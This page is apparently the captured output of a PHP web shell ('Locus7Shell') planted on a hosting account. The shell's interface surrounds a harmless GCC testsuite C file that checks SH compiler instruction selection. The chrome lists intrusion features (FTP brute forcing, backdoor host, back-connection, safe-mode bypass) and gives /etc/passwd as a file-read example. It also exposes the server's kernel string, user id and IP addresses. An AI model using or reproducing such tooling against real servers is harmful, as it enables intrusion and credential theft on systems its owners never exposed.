Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/sh/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     pr49263.c (3.85 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* Verify that TST #imm, R0 instruction is generated if the constant
   allows it.  Under some circumstances another compare instruction might
   be selected, which is also fine.  Any AND instructions are considered
   counter productive and fail the test.  */
/* { dg-do compile }  */
/* { dg-options "-O2" } */
/* { dg-final { scan-assembler-not "and" } } */
/* { dg-final { scan-assembler-not "extu" } } */
/* { dg-final { scan-assembler-not "exts" } } */

#define make_func(__valtype__, __valget__, __tstval__, __suff__)\
  int test_imm_##__tstval__##__suff__ (__valtype__ val) \
    {\
      return ((__valget__) & (0x##__tstval__  << 0)) ? -20 : -40;\
    }

#define make_func_0_F(__valtype__, __valget__, __y__, __suff__)\
  make_func (__valtype__, __valget__, __y__##0, __suff__)\
  make_func (__valtype__, __valget__, __y__##1, __suff__)\
  make_func (__valtype__, __valget__, __y__##2, __suff__)\
  make_func (__valtype__, __valget__, __y__##3, __suff__)\
  make_func (__valtype__, __valget__, __y__##4, __suff__)\
  make_func (__valtype__, __valget__, __y__##5, __suff__)\
  make_func (__valtype__, __valget__, __y__##6, __suff__)\
  make_func (__valtype__, __valget__, __y__##7, __suff__)\
  make_func (__valtype__, __valget__, __y__##8, __suff__)\
  make_func (__valtype__, __valget__, __y__##9, __suff__)\
  make_func (__valtype__, __valget__, __y__##A, __suff__)\
  make_func (__valtype__, __valget__, __y__##B, __suff__)\
  make_func (__valtype__, __valget__, __y__##C, __suff__)\
  make_func (__valtype__, __valget__, __y__##D, __suff__)\
  make_func (__valtype__, __valget__, __y__##E, __suff__)\
  make_func (__valtype__, __valget__, __y__##F, __suff__)\

#define make_funcs_0_FF(__valtype__, __valget__, __suff__)\
  make_func_0_F (__valtype__, __valget__, 0, __suff__)\
  make_func_0_F (__valtype__, __valget__, 1, __suff__)\
  make_func_0_F (__valtype__, __valget__, 2, __suff__)\
  make_func_0_F (__valtype__, __valget__, 3, __suff__)\
  make_func_0_F (__valtype__, __valget__, 4, __suff__)\
  make_func_0_F (__valtype__, __valget__, 5, __suff__)\
  make_func_0_F (__valtype__, __valget__, 6, __suff__)\
  make_func_0_F (__valtype__, __valget__, 7, __suff__)\
  make_func_0_F (__valtype__, __valget__, 8, __suff__)\
  make_func_0_F (__valtype__, __valget__, 9, __suff__)\
  make_func_0_F (__valtype__, __valget__, A, __suff__)\
  make_func_0_F (__valtype__, __valget__, B, __suff__)\
  make_func_0_F (__valtype__, __valget__, C, __suff__)\
  make_func_0_F (__valtype__, __valget__, D, __suff__)\
  make_func_0_F (__valtype__, __valget__, E, __suff__)\
  make_func_0_F (__valtype__, __valget__, F, __suff__)\

make_funcs_0_FF (signed char*, *val, int8_mem)
make_funcs_0_FF (signed char, val, int8_reg)

make_funcs_0_FF (unsigned char*, *val, uint8_mem)
make_funcs_0_FF (unsigned char, val, uint8_reg)

make_funcs_0_FF (short*, *val, int16_mem)
make_funcs_0_FF (short, val, int16_reg)

make_funcs_0_FF (unsigned short*, *val, uint16_mem)
make_funcs_0_FF (unsigned short, val, uint16_reg)

make_funcs_0_FF (int*, *val, int32_mem)
make_funcs_0_FF (int, val, int32_reg)

make_funcs_0_FF (unsigned int*, *val, uint32_mem)
make_funcs_0_FF (unsigned int, val, uint32_reg)

make_funcs_0_FF (long long*, *val, int64_lowword_mem)
make_funcs_0_FF (long long, val, int64_lowword_reg)

make_funcs_0_FF (unsigned long long*, *val, uint64_lowword_mem)
make_funcs_0_FF (unsigned long long, val, uint64_lowword_reg)

make_funcs_0_FF (long long*, *val >> 32, int64_highword_mem)
make_funcs_0_FF (long long, val >> 32, int64_highword_reg)

make_funcs_0_FF (unsigned long long*, *val >> 32, uint64_highword_mem)
make_funcs_0_FF (unsigned long long, val >> 32, uint64_highword_reg)

make_funcs_0_FF (long long*, *val >> 16, int64_midword_mem)
make_funcs_0_FF (long long, val >> 16, int64_midword_reg)

make_funcs_0_FF (unsigned long long*, *val >> 16, uint64_midword_mem)
make_funcs_0_FF (unsigned long long, val >> 16, uint64_midword_reg)


Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0061 ]--